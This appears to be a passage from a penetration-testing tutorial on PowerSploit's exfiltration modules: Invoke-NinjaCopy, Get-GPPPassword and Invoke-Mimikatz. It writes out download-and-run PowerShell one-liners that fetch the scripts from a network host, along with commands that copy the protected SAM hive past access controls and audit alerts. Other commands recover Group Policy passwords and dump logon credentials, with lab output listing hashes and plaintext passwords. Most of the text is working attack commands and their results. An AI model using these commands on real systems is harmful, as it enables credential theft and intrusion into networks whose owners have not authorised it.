Invoke-NinjaCopy
This cmdlet is used to copy protected files which cannot be copied when the operating system is running.
We can easily install an Exfiltration PowerShell script “Invoke-NinjaCopy” using:
PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.108:8080/Exfiltration/Invoke-NinjaCopy.ps1")
PS C:\> Get-Help Invoke-NinjaCopy
NAME
Invoke-NinjaCopy
SYNOPSIS
This script can copy files off an NTFS volume by opening a read handle to the entire volume (such as c:) and parsin
g the NTFS structures. This requires you
are an administrator of the server. This allows you to bypass the following protections:
Files which are opened by a process and cannot be opened by other processes, such as the NTDS.dit file or SY
STEM registry hives
SACL flag set on a file to alert when the file is opened (I'm not using a Win32 API to open the file, so Win
dows has no clue)
Bypass DACL's, such as a DACL which only allows SYSTEM to open a file
If the LocalDestination param is specified, the file will be copied to the file path specified on the local server
(the server the script is being run from).
If the RemoteDestination param is specified, the file will be copied to the file path specified on the remote serve
r.
The script works by opening a read handle to the volume (which if logged, may stand out, but I don't think most peo
ple log this and other processes do it too).
The script then uses NTFS parsing code written by cyb70289 and posted to CodePlex to parse the NTFS structures. Sin
ce the NTFS parsing code is written
in C++, I have compiled the code to a DLL and load it reflective in to PowerShell using the Invoke-ReflectivePEInje
ction.ps1 script (see below for a link
to the original script).
Script: Invoke-NinjaCopy.ps1
Author: Joe Bialek, Twitter: @JosephBialek
Contributors: This script has a byte array hardcoded, which contains a DLL wich parses NTFS. This NTFS parsing code
was written by cyb70289 <[email protected]>
See the following link: http://www.codeproject.com/Articles//An-NTFS-Parser-Lib
The source code is also available with the distribution of this script.
License: GPLv3 or later
Required Dependencies: None
Optional Dependencies: None
Version:
ReflectivePEInjection version:
SYNTAX
Invoke-NinjaCopy [-Path] <String> [[-RemoteDestination] <String>] [[-ComputerName] <String[]>] [[-BufferSize] <UInt
>] [<CommonParameters>]
Invoke-NinjaCopy [-Path] <String> [[-LocalDestination] <String>] [[-ComputerName] <String[]>] [[-BufferSize] <UInt3
>] [<CommonParameters>]
DESCRIPTION
Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. This bypas
ses file DACL's,
read handle locks, and SACL's. You must be an administrator to run the script. This can be used to read SYSTEM file
s which are normally
locked, such as the NTDS.dit file or registry hives.
RELATED LINKS
Blog: http://clymb3r.wordpress.com/
Github repo: https://github.com/clymb3r/PowerShell
NTFS Parsing Code: http://www.codeproject.com/Articles//An-NTFS-Parser-Lib
Blog on reflective loading: http://clymb3r.wordpress.com////reflective-dll-injection-with-powershell/
REMARKS
To see the examples, type: "get-help Invoke-NinjaCopy -examples".
For more information, type: "get-help Invoke-NinjaCopy -detailed".
For technical information, type: "get-help Invoke-NinjaCopy -full".
Execute “Invoke-NinjaCopy” using the following the command to copy the protected “SAM” file:
PS C:\> Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination C:\Users\Administrator\Desktop\SAM
PS C:\> dir C:\Users\Administrator\Desktop\SAM
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 11/8/2015 2:25 PM 262144 SAM
Invoke-GPPPassword
PS C:\Users\test\Desktop> Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1')
PS C:\Users\test\Desktop> Get-Help -Examples Get-GPPPassword
NAME
Get-GPPPassword
SYNOPSIS
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
PowerSploit Function: Get-GPPPassword
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
-------------------------- EXAMPLE 1 --------------------------
PS C:\>Get-GPPPassword
NewName : [BLANK]
Changed : {2014-02-21 05:28:53}
Passwords : {password12}
UserNames : {test1}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml
NewName : {mspresenters}
Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
Passwords : {Recycling*3ftw!, password123, password1234}
UserNames : {Administrator (built-in), DummyAccount, dummy2}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
NewName : [BLANK]
Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52}
Passwords : {password, password1234$}
UserNames : {administrator, admin}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
NewName : [BLANK]
Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36}
Passwords : {password, read123}
UserNames : {DEMO\Administrator, admin}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml
-------------------------- EXAMPLE 2 --------------------------
PS C:\>Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq
password
password12
password123
password1234
password1234$
read123
Recycling*3ftw!
How to run PowerSploit in cmd ?
C:\Windows\system32>powershell -Command "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.114:8080/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Dec 14 2015 18:03:07)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with modules * * */
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : ; (:d17a)
Session : Interactive from
User Name : test
Domain : lab
Logon Server : LAB
Logon Time : // :: AM
SID : S-------
msv :
[] Primary
* Username : test
* Domain : lab
* NTLM : f7eaee8fb117ad06bdd830b7586c
* SHA1 : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
[] CredentialKeys
* NTLM : f7eaee8fb117ad06bdd830b7586c
* SHA1 : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
tspkg :
* Username : test
* Domain : lab
* Password : password
wdigest :
* Username : test
* Domain : lab
* Password : password
kerberos :
* Username : test
* Domain : lab
* Password : (null)
ssp :
credman :
Authentication Id : ; (:d163)
Session : Interactive from
User Name : test
Domain : lab
Logon Server : LAB
Logon Time : // :: AM
SID : S-------
msv :
[] CredentialKeys
* NTLM : f7eaee8fb117ad06bdd830b7586c
* SHA1 : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
[] Primary
* Username : test
* Domain : lab
* NTLM : f7eaee8fb117ad06bdd830b7586c
* SHA1 : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
tspkg :
* Username : test
* Domain : lab
* Password : password
wdigest :
* Username : test
* Domain : lab
* Password : password
kerberos :
* Username : test
* Domain : lab
* Password : (null)
ssp :
credman :
Authentication Id : ; (:)
Session : Service from
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : // :: AM
SID : S---
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : ; (:)
Session : Service from
User Name : LAB$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : // :: AM
SID : S---
msv :
tspkg :
wdigest :
* Username : LAB$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : lab$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : ; (:d43f)
Session : UndefinedLogonType from
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : // :: AM
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : ; (:)
Session : UndefinedLogonType from
User Name : LAB$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : // :: AM
SID : S---
msv :
tspkg :
wdigest :
* Username : LAB$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : lab$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
mimikatz(powershell) # exit
Bye!
References
- https://github.com/PowerShellMafia/PowerSploit
- http://resources.infosecinstitute.com/powershell-toolkit-powersploit/
- http://colesec.inventedtheinternet.com/tag/metasploit/
- https://www.microsoft.com/en-us/download/details.aspx?id=42554
- https://msdn.microsoft.com/en-us/powershell/mt173057.aspx
- https://github.com/powershell/powershell